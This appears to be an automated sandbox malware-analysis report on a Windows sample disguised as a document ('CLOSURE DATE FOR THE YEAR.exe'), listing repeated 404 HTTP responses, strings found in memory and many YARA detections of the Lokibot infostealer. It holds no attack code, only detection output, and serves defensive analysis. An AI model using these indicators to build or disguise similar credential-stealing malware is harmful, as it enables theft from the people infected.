Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:53:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:54:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:54:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: IOsbBBIDAm.exe, 00000009.00000002.2066244082.00000000027D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://localhost/arkanoid_server/requests.php
Source: CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1754216796.00000000027E9000.00000004.00000800.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2066244082.00000000027D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
